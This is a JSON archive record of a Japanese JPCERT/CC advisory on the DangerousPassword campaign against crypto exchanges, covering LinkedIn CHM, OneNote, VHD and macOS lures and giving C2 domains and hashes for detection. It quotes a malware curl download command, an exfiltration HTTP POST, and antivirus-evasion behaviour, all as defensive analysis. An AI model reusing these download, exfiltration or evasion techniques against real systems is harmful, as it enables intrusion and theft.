{ "id": "6e8b193a-1bdc-4853-a329-ca6eeaa694c9", "created_at": "2026-04-06T00:08:39.407063Z", "updated_at": "2026-04-10T03:35:51.12059Z", "deleted_at": null, "sha1_hash": "fc7bfad66620d789bb54b2f566a6c44d2a9f251a", "title": "攻撃キャンペーンDangerousPasswordに関連する攻撃動向 - JPCERT/CC Eyes", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1749860, "plain_text": "攻撃キャンペーンDangerousPasswordに関連する攻撃動向 -\r\nJPCERT/CC Eyes\r\nBy 朝長 秀誠 (Shusei Tomonaga)\r\nPublished: 2023-04-30 · Archived: 2026-04-05 16:59:00 UTC\r\nJPCERT/CCは、2019年6月から継続して攻撃キャンペーンDangerousPassword(CryptoMimicまたは、\r\nSnatchCryptoとも呼ばれる)に関連すると考えられる暗号資産交換事業者への攻撃を確認しています。\r\n攻撃者は、ショートカットファイルをメールでターゲットに送信して、マルウェアに感染させようと\r\nする攻撃手法を長年続けているのですが、その他にもいろんなパターンの攻撃を行いながらマルウェ\r\nア感染を狙っていることがわかっています。今回は、最近確認されたDangerousPasswordの攻撃手法に\r\nついて紹介します。\r\n今回、紹介する攻撃パターンは以下の4つです。\r\nLinkedinから不正なCHMファイルを送りつけてくる攻撃\r\nOneNoteファイルを利用した攻撃\r\n仮想ハードディスク(Virtual Hard Disk)ファイルを利用した攻撃\r\nmacOSを狙った攻撃\r\nLinkedInから不正なCHMファイルを送りつけてくる攻撃\r\n攻撃者は、メールの添付ファイルでマルウェアを送信してくる以外にも、LinkedInでターゲットにコン\r\nタクトしてきて、マルウェアを送りつけてくる場合もあります。図1は、LinkedIn経由で送られてきた\r\nマルウェアがホスト上に感染するまでの流れです。\r\n図1:マルウェア感染の流れ\r\nLinkedIn経由で送られてきたファイルはRAR形式で圧縮されており、展開するとWindowsヘルプファイ\r\nル(CHMファイル)が含まれています。このファイルを実行すると、外部からWindows インストーラ\r\nー ファイル(MSIファイル)をダウンロードして実行します。実行されたMSIファイルは、PowerShell\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 1 of 13\n\nスクリプトを使用して外部から追加のMSIファイルをダウンロードして実行します(図1の\r\nAdministrator-a214051.msi、なおファイル名は [実行したユーザー名]-a[ランダムな数字5桁]1.msi とな\r\nる)。このMSIファイルは、感染ホストの情報を送信する機能を持っており、以下のようにHTTP\r\nPOSTリクエストで情報を送信します。送信する感染ホストの情報は、Base64エンコードされていま\r\nす。\r\nPOST /test.msi HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: ja-JP\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nContent-Length: 8708\r\nHost: [サーバー名]\r\nVGltZToJV2VkIERl(...)\r\n図2は、マルウェアが感染ホストの情報を収集するコードの一部です。JScriptで作成されていることが\r\nわかります。\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 2 of 13\n\n図2:マルウェアのコードの一部\r\nなお、ターゲットに対してコンタクトしてくるLinkedInアカウントは、求人情報を連絡するように装っ\r\nて、ターゲットに対してマルウェアを送りつけてくることを確認しています。図3はターゲットに対し\r\nてコンタクトしてきたLinkedInアカウントですが、これらのアカウントも攻撃者によって乗っ取られて\r\nいると考えられます。現在のところ、攻撃者がSNSアカウントを乗っ取る方法については不明です。\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 3 of 13\n\n図3:攻撃者に悪用されたLinkedInアカウント例\r\nOneNoteファイルを利用した攻撃\r\nOneNoteファイルを悪用してマルウェアに感染させようとする手法は、Emotetなどでも確認されてお\r\nり、メールの添付ファイルから感染を広げるタイプの攻撃では定番になりつつあります。\r\nDangerousPasswordも、同様の攻撃手法を利用しており、図4のようなマルウェアの埋め込まれた\r\nOneNoteファイルを送付し、OneNoteファイルを表示した際に表示されるアイコン(図4のPDFファイル\r\nに見せかけたアイコン)をクリックさせることで、マルウェア感染させようとします。\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 4 of 13\n\n図4:OneNoteファイルの例\r\nOneNoteファイルに埋め込まれたマルウェアはMSIファイルで、DLLファイルをホスト上に保存して、\r\n実行します。DLLファイルは、以下のcurlコマンドを使用してマルウェアをダウンロードします。\r\ncurl -A cur1-agent -L [URL] -x [Proxy] -s -d dl\r\nまた、このマルウェアは図5のようにウイルス対策ソフトを検知する機能を持っています。\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 5 of 13\n\n図5:ウイルス対策ソフトを検知するコードの一部\r\n以下のウイルス対策ソフトを検知した場合、NTDLLへのフック処理を解除して、ウイルス対策ソフト\r\nの監視を逃れようとしたり[1]、curlコマンド実行時に送信するデータ( dl または da )が変更された\r\nり、ダウンロードしたマルウェアを実行する方法を変更(Explorerへのインジェクションまたは、\r\nRundll32を使って起動)したり、ホスト上での挙動を変更します。\r\nAvast\r\nAvira\r\nBitdefender\r\nKaspersky\r\nSophos\r\nTrend Micro\r\nWindows Defender\r\n仮想ハードディスク(Virtual Hard Disk)ファイルを利用した攻撃\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 6 of 13\n\n攻撃者は、マルウェアをZIPやRAR形式で圧縮したり、ISOファイルに含める以外にも、仮想ハードデ\r\nィスクファイル(VHDファイル)に含めている場合もあります。VHDファイルは、仮想化技術である\r\nHyper-Vにてハードディスクを使用するためにファイルとして保存する形式であり、Windows OS上では\r\nダブルクリックでマウントすることが可能です。図6は、マルウェアが含まれたVHDファイルをマウン\r\nトした様子です。中には、デコイのPDFファイルとメインのマルウェア(DLLファイル)およびDLLフ\r\nァイルを起動するための実行ファイル(EXEファイル)が含まれています。\r\n図6:VHDファイルをマウントした例\r\nDLLファイルは、前節で説明したOneNoteファイルに含まれていたマルウェアと同様の機能を持ったマ\r\nルウェアです。\r\nmacOSを狙った攻撃\r\n攻撃者は、Windows OSだけではなくmacOSもターゲットにしていることを確認しています。図7は、\r\nmacOSをターゲットにしたマルウェアのファイル構成です。\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 7 of 13\n\n図7:マルウェアのファイル構成\r\n図8のように、 main.scpt 内に不正なアプリケーションをcurlコマンドを使ってダウンロードし、実行\r\nするAppleScriptが含まれています。\r\n図8: 不正なAppleScriptの内容\r\nダウンロードされるアプリケーションを実行すると、図9のような画面が起動します。読み込ませるフ\r\nァイルの内容をXORデコードして、デコードされた通信先からファイルをダウンロードして、実行す\r\nる機能(図10)を持っています。\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 8 of 13\n\n図9:ダウンロードされたマルウェア実行時に表示される画面\r\n図10:ファイルをダウンロードするコードの一部\r\nなお、本マルウェアの詳細についてはjamfのブログ[2]でも公開されているため、そちらもご参照くだ\r\nさい。\r\nおわりに\r\n標的型攻撃グループDangerousPasswordは、国内の暗号資産交換事業者に対して、引き続き攻撃を行っ\r\nています。この攻撃グループは、LinkedInからターゲットに対してコンタクトしてくることもあるの\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 9 of 13\n\nで、SNSの使用時には注意が必要です。また、macOSもターゲットになる可能性もあるため、macOSを\r\n使用している場合も警戒しておくことが重要です。今回紹介したマルウェアの通信先などについて\r\nは、Appendixに記載していますのでご確認ください。\r\nインシデントレスポンスグループ 朝長 秀誠\r\n参考情報\r\n[1] Red Team Notes: Full DLL Unhooking with C++\r\n  https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++\r\n[2] jamf: BlueNoroff APT group targets macOS with ‘RustBucket’ Malware\r\n  https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/\r\nAppendix A: 通信先\r\nwww.thecloudnet.org\r\nazure.protection-service.cloud\r\nverify.azure-protect.online\r\ndocs.azure-protection.cloud\r\nsecure.azure-protection.cloud\r\nweb.j-ic.co\r\ncloud.dnx.capital\r\n104.200.137.32\r\none.microshare.cloud\r\nwww.capmarketreport.com\r\nsafe.doc-share.cloud\r\nopenaibt.com\r\ncloud.espcapital.pro\r\nautoprotect.com.de\r\nAppendix B: マルウェアのハッシュ値\r\nbdd109cba8346548dd6fe5110180aa23eb9f5805c90733025344a5881c15c985\r\n4867215129fead94a52e4b62ef6851b3170a0a8b66a87eadfc919f84257d25b8\r\nf0b6d6981e06c7be2e45650e5f6d39570c1ee640ccb157ddfe42ee23ad4d1cdb\r\n31908e42d8cb30f5bda71516de7c5c6a329c7dddcae77e19f64379d351177b90\r\n782f24a4b8fa692489ddfdac5eb989f5852bbe0da05c2e27190047f77282b936\r\nfc07a2468fafc762e106dd33fd0734a05118eb96d66fcc7ed358669e888d53ca\r\n248867e775fda3c6c03c1daeb0e10d2ce5956cb1c164bbd980ff98fe2f97e38c\r\n5816eb32cbaadfc3477c823293a8c49cdf690b443c8fa3c19f98399c143df2b3\r\n5f4f006bfb9136c304e0aabf75575360120d022567180ce6b9c1835e209c541e\r\n4fb31b9f5432fd09f1fa51a35e8de98fca6081d542827b855db4563be2e50e58\r\nf14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e22\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 10 of 13\n\n826f2a2a25f7b7d42f54d18a99f6721f855ba903db7b125d7dea63d0e4e6df64\r\nd6c3d0d2dedfa37cd1bebded60f303b21da860dcac49cfaa06e3172f0b1138ce\r\nf14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e22\r\n48bd1c5cf9ccc3d454ab80d7284abaf39028a228607d132bfa92ab2ceca47ca2\r\nf0cf1829a93751d2f7e812545af079a4efebd755f1ee50a8d4537770f692eaaf\r\n9472f5ecac1672186bc1275cc70f024c734d0e6926917ce22b2cb6b1765ce83e\r\nab31b0cb796b3ae001fb4d12d9cac8c98911e11322cb974bf8d2be9303259a5e\r\nf14c5bad5219b1ed5166eb02f5ff08a890a181cef2af565f3fe7bcea9c870e22\r\n5ad84c75b4a8825a4ee49fcb2ab895f0a51c9877fc4e50595fa1917ae1daa748\r\n8a7ba38d597e8230609df4153039d1bb898479d486e653a6d92d206dd4848c80\r\nba186a1a97d4f647dad39cb3ccae5466bb8d5463ceedf470428484416265ef5f\r\n7e2b38decf1f826fbb792d762d9e6a29147e9ecb44eb2ad2c4dc08e7ee01a140\r\nc56a97efd6d3470e14193ac9e194fa46d495e3dddc918219cca530b90f01d11e\r\n9525f5081a5a7ab7d35cf2fb2d7524e0777e37fe3df62730e1e7de50506850f7\r\n7981ebf35b5eff8be2f3849c8f3085b9cec10d9759ff4d3afd46990520de0407\r\n38106b043ede31a66596299f17254d3f23cbe1f983674bf9ead5006e0f0bf880\r\n741be5e53a5dc7cebaa63d6ff624c5eff1a0e1817ede1e7fc0473a28b1ed7a33\r\na131edf272f1df1c841a9c457a50011325b1e22e950d62c5e78d3060450e6b93\r\nb63bca8d35653ce17b99b89f00fbee9b5cb6a70420b7dd0c3194038b9031e3e2\r\n9f7a7717884519763f043c39c1cb2a9605da123c18b72e5bedcd5d587a54a0e8\r\na3f087c83453cde2bc845122c05ebeb60e8891e395b45823c192869ec1b72ea6\r\n3a4aed5b9ad0827696a1bb5f3497a6a2aa26b453d27bfacbe3c8c47673aac98d\r\n02acbedc105104541e67eec1ef845c7d68d624faa56e81713e3216ca66a7f3c7\r\n1bc742f1aebbc12220cd6bf761509fd3a7aae2d5de88dce8d45fb5cf79ad8ccb\r\na2fd03354c2ec433d2eedc28e85c0fe5841b848d5fff1e6583e2d9e1a81b6ca3\r\n049bfff97fbb2c5e53eeed6df36d2c93c7cca199d42c0247c784b39db90f173b\r\n26e376fc80b090b2ee04e7d3104d308a150e58538580109a74f4ac49bf362423\r\n60701bdae4b33de7c53e4a0708b7187f313730bd09c4c553847134f268160a73\r\na064e62cb168affa9dac8a4374b582bfa289e182f8a5e0b731c4ea9408d99ae3\r\na1a30091cf25740468cd1894d39fce07039f89f05eee90cf72aa085698eeeff6\r\nd18cda8fc17f0c412b209dda24784cbe666fe79a708c9965cd18eef85439adb2\r\n7935839ab987a47b9bacc2daf12e7af590259abcfdd473c81a7e540e58ed5760\r\neee5ee98f57ab2b30a3bf04b8fa9d7b90455ddf2d39c8c4e04958b77d9170411\r\nd0072130eb4ee81ffba5b703a16c276b0c59b408cb8aa3915980f0f098f04984\r\n朝長 秀誠 (Shusei Tomonaga)\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 11 of 13\n\n外資系ITベンダーでのセキュリティ監視・分析業務を経て、2012年12月から現職。現在は、マルウェ\r\nア分析・フォレンジック調査に従事。主に、標的型攻撃に関するインシデント分析を行っている。\r\nCODE BLUE、BsidesLV、BlackHat USA Arsenal、Botconf、PacSec、FIRSTなどで講演。JSACオーガナ\r\nイザー。\r\n関連記事\r\nJSAC2026 開催レポート~DAY 2~\r\n攻撃グループAPT-C-60による攻撃のアップデート\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 12 of 13\n\nCobalt Strike Beaconの機能をクロスプラットフォームへと拡張するツール「CrossC2」を使った攻\r\n撃\r\nIvanti Connect Secureの脆弱性を起点とした侵害で確認されたマルウェア\r\nIvanti Connect Secureに設置されたマルウェアDslogdRAT\r\nSource: https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nhttps://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html\r\nPage 13 of 13", "extraction_quality": 1, "language": "JA", "sources": [ "Malpedia" ], "references": [ "https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html" ], "report_names": [ "dangerouspassword.html" ], "threat_actors": [ { "id": "15b8d5d8-32cf-408b-91b1-5d6ac1de9805", "created_at": "2023-07-20T02:00:08.724751Z", "updated_at": "2026-04-10T02:00:03.341845Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "MISPGALAXY:APT-C-60", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ab47428c-7a8e-4ee8-9c8e-4e55c94d2854", "created_at": "2024-12-28T02:01:54.668462Z", "updated_at": "2026-04-10T02:00:04.564201Z", "deleted_at": null, "main_name": "APT-C-60", "aliases": [ "APT-Q-12" ], "source_name": "ETDA:APT-C-60", "tools": [ "SpyGlace" ], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434119, "ts_updated_at": 1775792151, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fc7bfad66620d789bb54b2f566a6c44d2a9f251a.pdf", "text": "https://archive.orkl.eu/fc7bfad66620d789bb54b2f566a6c44d2a9f251a.txt", "img": "https://archive.orkl.eu/fc7bfad66620d789bb54b2f566a6c44d2a9f251a.jpg" } }